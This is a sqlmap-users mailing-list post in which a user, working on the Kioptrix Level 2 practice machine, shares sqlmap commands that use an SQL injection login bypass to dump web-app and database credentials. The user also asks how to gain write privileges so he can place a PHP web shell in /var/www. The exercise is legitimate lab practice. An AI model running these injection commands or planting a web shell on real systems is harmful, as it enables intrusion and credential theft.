hello:
I discovered a vulnerability that allows me to bypass the login screen. btw
this is the Kioptrix Level 2 puzzle and not a live client/target.
I've managed to dump credentials for the administrator's web interface in
addition to the database users themselves. There were a few recon commands
but the meatiest items are below.
Specific commands included:
>sudo python sqlmap.py -u "http://1 <http://172.16.207.129>92.168.1.1"
--data "uname=blah&psw=30' or '1'='1" --dbs --level 5 --risk 3
--string="Ping" -D webapp -T users --dump --proxy=http://127.0.0.1:8080 <---
gets me user credentials for the webapp
>sudo python sqlmap.py -u "http://1 <http://172.16.207.129>92.168.1.1"
--data "uname=blah&psw=30' or '1'='1" --dbs --level 5 --risk 3
--string="Ping" --passwords --proxy=http://127.0.0.1:8080 <--- gets me user
credentials for the DB.
However, I've discovered that the db user that I am running as does **not**
have the appropriate privileges to write
files to the system.
My objective is to write something like phpshell to the /var/www directory
and go from there.
Is there a way for sqlmap to switch from unprivileged user A to privileged
user B if I have both sets of credentials? If so, I can then use the
"file-write" and "file-dest" options.
thanks,
-pb
------------------------------------------------------------------------------
RSA(R) Conference 2012
Mar 27 - Feb 2
Save $400 by Jan. 27
Register now!
http://p.sf.net/sfu/rsa-sfdev2dev2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
